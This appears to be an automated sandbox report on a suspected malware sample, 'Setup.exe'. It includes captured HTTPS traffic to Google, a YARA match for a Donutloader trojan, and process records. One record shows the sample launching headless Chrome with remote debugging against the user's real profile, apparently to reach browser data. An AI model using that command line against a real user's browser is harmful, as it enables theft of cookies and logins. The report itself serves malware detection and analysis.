                                                                                                                                                                                                                                                    2024-12-27 20:27:47 UTC1390INData Raw: 30 30 33 64 5c 75 30 30 33 64 5c 22 73 74 72 69 6e 67 5c 22 29 7b 69 66 28 21 61 29 72 65 74 75 72 6e 3b 61 5c 75 30 30 33 64 2b 61 7d 69 66 28 74 79 70 65 6f 66 20 61 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 6e 75 6d 62 65 72 5c 22 29 72 65 74 75 72 6e 20 4e 75 6d 62 65 72 2e 69 73 46 69 6e 69 74 65 28 61 29 3f 61 7c 30 3a 76 6f 69 64 20 30 7d 3b 51 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 29 7b 6c 65 74 20 61 5c 75 30 30 33 64 6e 75 6c 6c 3b 69 66 28 21 50 64 29 72 65 74 75 72 6e 20 61 3b 74 72 79 7b 63 6f 6e 73 74 20 62 5c 75 30 30 33 64 63 5c 75 30 30 33 64 5c 75 30 30 33 65 63 3b 61 5c 75 30 30 33 64 50 64 2e 63 72 65 61 74 65 50 6f 6c 69 63 79 28 5c 22 6f 67 62 2d 71 74 6d 23 68 74 6d 6c 5c 22 2c 7b 63 72 65 61 74 65 48 54
                                                                                                                                                                                                                                                    Data Ascii: 003d\u003d\"string\"){if(!a)return;a\u003d+a}if(typeof a\u003d\u003d\u003d\"number\")return Number.isFinite(a)?a|0:void 0};Qd\u003dfunction(){let a\u003dnull;if(!Pd)return a;try{const b\u003dc\u003d\u003ec;a\u003dPd.createPolicy(\"ogb-qtm#html\",{createHT
                                                                                                                                                                                                                                                    2024-12-27 20:27:47 UTC1390INData Raw: 2c 62 29 2c 63 29 7d 3b 5f 2e 65 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 61 2e 6c 61 73 74 49 6e 64 65 78 4f 66 28 62 2c 30 29 5c 75 30 30 33 64 5c 75 30 30 33 64 30 7d 3b 50 64 5c 75 30 30 33 64 5f 2e 48 64 3b 5f 2e 54 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 69 5c 75 30 30 33 64 61 7d 74 6f 53 74 72 69 6e 67 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 69 2b 5c 22 5c 22 7d 7d 3b 57 64 5c 75 30 30 33 64 2f 5e 5c 5c 73 2a 28 3f 21 6a 61 76 61 73 63 72 69 70 74 3a 29 28 3f 3a 5b 5c 5c 77 2b 2e 2d 5d 2b 3a 7c 5b 5e 3a 2f 3f 23 5d 2a 28 3f 3a 5b 2f 3f 23 5d 7c 24 29 29 2f 69 3b 76 61 72 20 6a 65 2c 6e 65 2c 66 65 3b 5f 2e 68 65 5c 75 30 30 33 64 66 75 6e 63
                                                                                                                                                                                                                                                    Data Ascii: ,b),c)};_.ee\u003dfunction(a,b){return a.lastIndexOf(b,0)\u003d\u003d0};Pd\u003d_.Hd;_.Td\u003dclass{constructor(a){this.i\u003da}toString(){return this.i+\"\"}};Wd\u003d/^\\s*(?!javascript:)(?:[\\w+.-]+:|[^:/?#]*(?:[/?#]|$))/i;var je,ne,fe;_.he\u003dfunc


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    5192.168.2.449746172.217.21.364437068C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-27 20:27:46 UTC361OUTGET /async/newtab_promos HTTP/1.1
                                                                                                                                                                                                                                                    Host: www.google.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    2024-12-27 20:27:47 UTC933INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Version: 705503573
                                                                                                                                                                                                                                                    Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                    Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                    Permissions-Policy: unload=()
                                                                                                                                                                                                                                                    Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                    Date: Fri, 27 Dec 2024 20:27:47 GMT
                                                                                                                                                                                                                                                    Server: gws
                                                                                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                    Accept-Ranges: none
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                    2024-12-27 20:27:47 UTC35INData Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: 1d)]}'{"update":{"promos":{}}}
                                                                                                                                                                                                                                                    2024-12-27 20:27:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    6192.168.2.449758142.250.181.784437068C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-27 20:27:53 UTC741OUTGET /_/scs/abc-static/_/js/k=gapi.gapi.en.ZpMpph_5a4M.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo_c5__TAiALeuHoQOKG0BnSpdbJrQ/cb=gapi.loaded_0 HTTP/1.1
                                                                                                                                                                                                                                                    Host: apis.google.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    2024-12-27 20:27:54 UTC916INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                    Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/social-frontend-mpm-access
                                                                                                                                                                                                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin; report-to="social-frontend-mpm-access"
                                                                                                                                                                                                                                                    Report-To: {"group":"social-frontend-mpm-access","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/social-frontend-mpm-access"}]}
                                                                                                                                                                                                                                                    Content-Length: 117446
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    Server: sffe
                                                                                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                                                                                    Date: Thu, 26 Dec 2024 04:36:02 GMT
                                                                                                                                                                                                                                                    Expires: Fri, 26 Dec 2025 04:36:02 GMT
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                    Last-Modified: Mon, 02 Dec 2024 19:15:50 GMT
                                                                                                                                                                                                                                                    Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Age: 143511
                                                                                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    2024-12-27 20:27:54 UTC474INData Raw: 67 61 70 69 2e 6c 6f 61 64 65 64 5f 30 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 5f 2e 5f 46 5f 74 6f 67 67 6c 65 73 5f 69 6e 69 74 69 61 6c 69 7a 65 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 28 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 67 6c 6f 62 61 6c 54 68 69 73 3a 74 79 70 65 6f 66 20 73 65 6c 66 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 73 65 6c 66 3a 74 68 69 73 29 2e 5f 46 5f 74 6f 67 67 6c 65 73 3d 61 7c 7c 5b 5d 7d 3b 28 30 2c 5f 2e 5f 46 5f 74 6f 67 67 6c 65 73 5f 69 6e 69 74 69 61 6c 69 7a 65 29 28 5b 5d 29 3b 0a 76 61 72 20 63 61 2c 64 61 2c 68 61 2c 6d 61 2c 78 61 2c 41 61 2c 42 61 3b 63 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20
                                                                                                                                                                                                                                                    Data Ascii: gapi.loaded_0(function(_){var window=this;_._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a||[]};(0,_._F_toggles_initialize)([]);var ca,da,ha,ma,xa,Aa,Ba;ca=function(a){var
                                                                                                                                                                                                                                                    2024-12-27 20:27:54 UTC1390INData Raw: 61 6c 75 65 3b 72 65 74 75 72 6e 20 61 7d 3b 0a 68 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 3d 5b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2c 61 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 73 65 6c 66 26 26 73 65 6c 66 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 5d 3b 66 6f 72 28 76 61 72 20 62 3d 30 3b 62 3c 61 2e 6c 65 6e 67 74 68 3b 2b 2b 62 29 7b 76 61 72 20 63 3d 61 5b 62 5d 3b 69 66 28 63 26 26 63 2e 4d 61 74 68 3d 3d 4d 61 74 68 29 72 65 74 75 72 6e 20 63 7d 74 68 72 6f 77 20 45 72 72 6f 72 28 22 61 22 29 3b 7d 3b
                                                                                                                                                                                                                                                    Data Ascii: alue;return a};ha=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};
                                                                                                                                                                                                                                                    2024-12-27 20:27:54 UTC1390INData Raw: 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 62 2e 70 72 6f 74 6f 74 79 70 65 3d 61 3b 72 65 74 75 72 6e 20 6e 65 77 20 62 7d 2c 71 61 3b 69 66 28 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 71 61 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3b 65 6c 73 65 7b 76 61 72 20 72 61 3b 61 3a 7b 76 61 72 20 73 61 3d 7b 61 3a 21 30 7d 2c 77 61 3d 7b 7d 3b 74 72 79 7b 77 61 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 73 61 3b 72 61 3d 77 61 2e 61 3b 62 72 65 61 6b 20 61 7d 63 61 74 63 68 28 61 29 7b 7d 72 61 3d 21 31 7d 71 61 3d 72 61 3f 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 61 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 62 3b 69 66 28
                                                                                                                                                                                                                                                    Data Ascii: function(a){var b=function(){};b.prototype=a;return new b},qa;if(typeof Object.setPrototypeOf=="function")qa=Object.setPrototypeOf;else{var ra;a:{var sa={a:!0},wa={};try{wa.__proto__=sa;ra=wa.a;break a}catch(a){}ra=!1}qa=ra?function(a,b){a.__proto__=b;if(
                                                                                                                                                                                                                                                    2024-12-27 20:27:54 UTC1390INData Raw: 7b 66 6f 72 28 3b 74 68 69 73 2e 46 66 26 26 74 68 69 73 2e 46 66 2e 6c 65 6e 67 74 68 3b 29 7b 76 61 72 20 68 3d 74 68 69 73 2e 46 66 3b 74 68 69 73 2e 46 66 3d 5b 5d 3b 66 6f 72 28 76 61 72 20 6b 3d 30 3b 6b 3c 68 2e 6c 65 6e 67 74 68 3b 2b 2b 6b 29 7b 76 61 72 20 6c 3d 68 5b 6b 5d 3b 68 5b 6b 5d 3d 6e 75 6c 6c 3b 74 72 79 7b 6c 28 29 7d 63 61 74 63 68 28 6d 29 7b 74 68 69 73 2e 6d 71 28 6d 29 7d 7d 7d 74 68 69 73 2e 46 66 3d 6e 75 6c 6c 7d 3b 62 2e 70 72 6f 74 6f 74 79 70 65 2e 6d 71 3d 66 75 6e 63 74 69 6f 6e 28 68 29 7b 74 68 69 73 2e 7a 50 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 72 6f 77 20 68 3b 0a 7d 29 7d 3b 76 61 72 20 65 3d 66 75 6e 63 74 69 6f 6e 28 68 29 7b 74 68 69 73 2e 45 61 3d 30 3b 74 68 69 73 2e 77 66 3d 76 6f 69 64 20 30 3b 74 68 69
                                                                                                                                                                                                                                                    Data Ascii: {for(;this.Ff&&this.Ff.length;){var h=this.Ff;this.Ff=[];for(var k=0;k<h.length;++k){var l=h[k];h[k]=null;try{l()}catch(m){this.mq(m)}}}this.Ff=null};b.prototype.mq=function(h){this.zP(function(){throw h;})};var e=function(h){this.Ea=0;this.wf=void 0;thi
                                                                                                                                                                                                                                                    2024-12-27 20:27:54 UTC1390INData Raw: 68 28 22 75 6e 68 61 6e 64 6c 65 64 72 65 6a 65 63 74 69 6f 6e 22 2c 7b 63 61 6e 63 65 6c 61 62 6c 65 3a 21 30 7d 29 3a 74 79 70 65 6f 66 20 6b 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 68 3d 6e 65 77 20 6b 28 22 75 6e 68 61 6e 64 6c 65 64 72 65 6a 65 63 74 69 6f 6e 22 2c 7b 63 61 6e 63 65 6c 61 62 6c 65 3a 21 30 7d 29 3a 28 68 3d 5f 2e 6c 61 2e 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 43 75 73 74 6f 6d 45 76 65 6e 74 22 29 2c 68 2e 69 6e 69 74 43 75 73 74 6f 6d 45 76 65 6e 74 28 22 75 6e 68 61 6e 64 6c 65 64 72 65 6a 65 63 74 69 6f 6e 22 2c 21 31 2c 21 30 2c 68 29 29 3b 68 2e 70 72 6f 6d 69 73 65 3d 74 68 69 73 3b 68 2e 72 65 61 73 6f 6e 3d 74 68 69 73 2e 77 66 3b 72 65 74 75 72 6e 20 6c 28 68 29 7d 3b 65 2e 70 72 6f 74 6f 74 79
                                                                                                                                                                                                                                                    Data Ascii: h("unhandledrejection",{cancelable:!0}):typeof k==="function"?h=new k("unhandledrejection",{cancelable:!0}):(h=_.la.document.createEvent("CustomEvent"),h.initCustomEvent("unhandledrejection",!1,!0,h));h.promise=this;h.reason=this.wf;return l(h)};e.prototy
                                                                                                                                                                                                                                                    2024-12-27 20:27:54 UTC1390INData Raw: 64 6f 6e 65 29 7d 29 7d 3b 72 65 74 75 72 6e 20 65 7d 29 3b 76 61 72 20 43 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 69 66 28 61 3d 3d 6e 75 6c 6c 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 54 68 65 20 27 74 68 69 73 27 20 76 61 6c 75 65 20 66 6f 72 20 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 22 2b 63 2b 22 20 6d 75 73 74 20 6e 6f 74 20 62 65 20 6e 75 6c 6c 20 6f 72 20 75 6e 64 65 66 69 6e 65 64 22 29 3b 69 66 28 62 20 69 6e 73 74 61 6e 63 65 6f 66 20 52 65 67 45 78 70 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 46 69 72 73 74 20 61 72 67 75 6d 65 6e 74 20 74 6f 20 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 22 2b 63 2b 22 20 6d 75 73 74 20 6e 6f 74 20 62 65 20 61 20 72 65 67 75 6c
                                                                                                                                                                                                                                                    Data Ascii: done)})};return e});var Ca=function(a,b,c){if(a==null)throw new TypeError("The 'this' value for String.prototype."+c+" must not be null or undefined");if(b instanceof RegExp)throw new TypeError("First argument to String.prototype."+c+" must not be a regul
                                                                                                                                                                                                                                                    2024-12-27 20:27:54 UTC1390INData Raw: 5f 68 69 64 64 65 6e 5f 22 2b 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 3b 65 28 22 66 72 65 65 7a 65 22 29 3b 65 28 22 70 72 65 76 65 6e 74 45 78 74 65 6e 73 69 6f 6e 73 22 29 3b 65 28 22 73 65 61 6c 22 29 3b 76 61 72 20 68 3d 30 2c 6b 3d 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 74 68 69 73 2e 46 61 3d 28 68 2b 3d 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 2b 31 29 2e 74 6f 53 74 72 69 6e 67 28 29 3b 69 66 28 6c 29 7b 6c 3d 5f 2e 79 61 28 6c 29 3b 66 6f 72 28 76 61 72 20 6d 3b 21 28 6d 3d 6c 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 3b 29 6d 3d 6d 2e 76 61 6c 75 65 2c 74 68 69 73 2e 73 65 74 28 6d 5b 30 5d 2c 6d 5b 31 5d 29 7d 7d 3b 6b 2e 70 72 6f 74 6f 74 79 70 65 2e 73 65 74 3d 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 69 66 28 21 63 28 6c 29 29 74 68 72 6f 77 20 45
                                                                                                                                                                                                                                                    Data Ascii: _hidden_"+Math.random();e("freeze");e("preventExtensions");e("seal");var h=0,k=function(l){this.Fa=(h+=Math.random()+1).toString();if(l){l=_.ya(l);for(var m;!(m=l.next()).done;)m=m.value,this.set(m[0],m[1])}};k.prototype.set=function(l,m){if(!c(l))throw E
                                                                                                                                                                                                                                                    2024-12-27 20:27:54 UTC1390INData Raw: 74 68 69 73 5b 31 5d 2e 53 6b 3d 6d 2e 5a 65 2c 74 68 69 73 2e 73 69 7a 65 2b 2b 29 3b 72 65 74 75 72 6e 20 74 68 69 73 7d 3b 63 2e 70 72 6f 74 6f 74 79 70 65 2e 64 65 6c 65 74 65 3d 66 75 6e 63 74 69 6f 6e 28 6b 29 7b 6b 3d 64 28 74 68 69 73 2c 6b 29 3b 72 65 74 75 72 6e 20 6b 2e 5a 65 26 26 6b 2e 6c 69 73 74 3f 28 6b 2e 6c 69 73 74 2e 73 70 6c 69 63 65 28 6b 2e 69 6e 64 65 78 2c 31 29 2c 6b 2e 6c 69 73 74 2e 6c 65 6e 67 74 68 7c 7c 64 65 6c 65 74 65 20 74 68 69 73 5b 30 5d 5b 6b 2e 69 64 5d 2c 6b 2e 5a 65 2e 53 6b 2e 6e 65 78 74 3d 6b 2e 5a 65 2e 6e 65 78 74 2c 6b 2e 5a 65 2e 6e 65 78 74 2e 53 6b 3d 0a 6b 2e 5a 65 2e 53 6b 2c 6b 2e 5a 65 2e 68 65 61 64 3d 6e 75 6c 6c 2c 74 68 69 73 2e 73 69 7a 65 2d 2d 2c 21 30 29 3a 21 31 7d 3b 63 2e 70 72 6f 74 6f 74
                                                                                                                                                                                                                                                    Data Ascii: this[1].Sk=m.Ze,this.size++);return this};c.prototype.delete=function(k){k=d(this,k);return k.Ze&&k.list?(k.list.splice(k.index,1),k.list.length||delete this[0][k.id],k.Ze.Sk.next=k.Ze.next,k.Ze.next.Sk=k.Ze.Sk,k.Ze.head=null,this.size--,!0):!1};c.protot
                                                                                                                                                                                                                                                    2024-12-27 20:27:54 UTC1390INData Raw: 63 74 69 6f 6e 28 29 7b 69 66 28 21 61 7c 7c 74 79 70 65 6f 66 20 61 21 3d 22 66 75 6e 63 74 69 6f 6e 22 7c 7c 21 61 2e 70 72 6f 74 6f 74 79 70 65 2e 65 6e 74 72 69 65 73 7c 7c 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 73 65 61 6c 21 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 31 3b 74 72 79 7b 76 61 72 20 63 3d 4f 62 6a 65 63 74 2e 73 65 61 6c 28 7b 78 3a 34 7d 29 2c 64 3d 6e 65 77 20 61 28 5f 2e 79 61 28 5b 63 5d 29 29 3b 69 66 28 21 64 2e 68 61 73 28 63 29 7c 7c 64 2e 73 69 7a 65 21 3d 31 7c 7c 64 2e 61 64 64 28 63 29 21 3d 64 7c 7c 64 2e 73 69 7a 65 21 3d 31 7c 7c 64 2e 61 64 64 28 7b 78 3a 34 7d 29 21 3d 64 7c 7c 64 2e 73 69 7a 65 21 3d 32 29 72 65 74 75 72 6e 21 31 3b 76 61 72 20 65 3d 64 2e 65 6e 74 72 69 65 73 28 29 2c 66 3d 65 2e 6e
                                                                                                                                                                                                                                                    Data Ascii: ction(){if(!a||typeof a!="function"||!a.prototype.entries||typeof Object.seal!="function")return!1;try{var c=Object.seal({x:4}),d=new a(_.ya([c]));if(!d.has(c)||d.size!=1||d.add(c)!=d||d.size!=1||d.add({x:4})!=d||d.size!=2)return!1;var e=d.entries(),f=e.n
                                                                                                                                                                                                                                                    2024-12-27 20:27:54 UTC1390INData Raw: 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 65 6e 74 72 69 65 73 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 46 61 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 72 65 74 75 72 6e 5b 62 2c 63 5d 7d 29 7d 7d 29 3b 0a 6d 61 28 22 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 6b 65 79 73 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 46 61 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 62 29 7b 72 65 74 75 72 6e 20 62 7d 29 7d 7d 29 3b 6d 61 28 22 67 6c 6f 62 61 6c 54 68 69 73 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 7c 7c 5f 2e 6c 61 7d 29 3b 6d 61 28 22 53
                                                                                                                                                                                                                                                    Data Ascii: ray.prototype.entries",function(a){return a?a:function(){return Fa(this,function(b,c){return[b,c]})}});ma("Array.prototype.keys",function(a){return a?a:function(){return Fa(this,function(b){return b})}});ma("globalThis",function(a){return a||_.la});ma("S


                                                                                                                                                                                                                                                    Statistics

                                                                                                                                                                                                                                                    CPU Usage

                                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                                    Memory Usage

                                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                                    High Level Behavior Distribution

                                                                                                                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                                                                                                                    Behavior

                                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                                    System Behavior

                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                    Target ID:0
                                                                                                                                                                                                                                                    Start time:15:27:22
                                                                                                                                                                                                                                                    Start date:27/12/2024
                                                                                                                                                                                                                                                    Path:C:\Users\user\Desktop\Setup.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:"C:\Users\user\Desktop\Setup.exe"
                                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                                    File size:76'542'479 bytes
                                                                                                                                                                                                                                                    MD5 hash:F18FA7132A5EDA29041FDD8AE85363DB
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:Borland Delphi
                                                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                                                    • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                    Target ID:2
                                                                                                                                                                                                                                                    Start time:15:27:42
                                                                                                                                                                                                                                                    Start date:27/12/2024
                                                                                                                                                                                                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --headless=new --remote-debugging-port=12960 --remote-allow-origins=* --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --profile-directory="Default"
                                                                                                                                                                                                                                                    Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                                    File size:3'242'272 bytes
                                                                                                                                                                                                                                                    MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                    Target ID:4
                                                                                                                                                                                                                                                    Start time:15:27:43
                                                                                                                                                                                                                                                    Start date:27/12/2024
                                                                                                                                                                                                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --mojo-platform-channel-handle=2140 --field-trial-handle=2028,i,5279315519537041474,755320844484096508,262144 --disable-features=PaintHolding /prefetch:8
                                                                                                                                                                                                                                                    Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                                    File size:3'242'272 bytes
                                                                                                                                                                                                                                                    MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                                    General

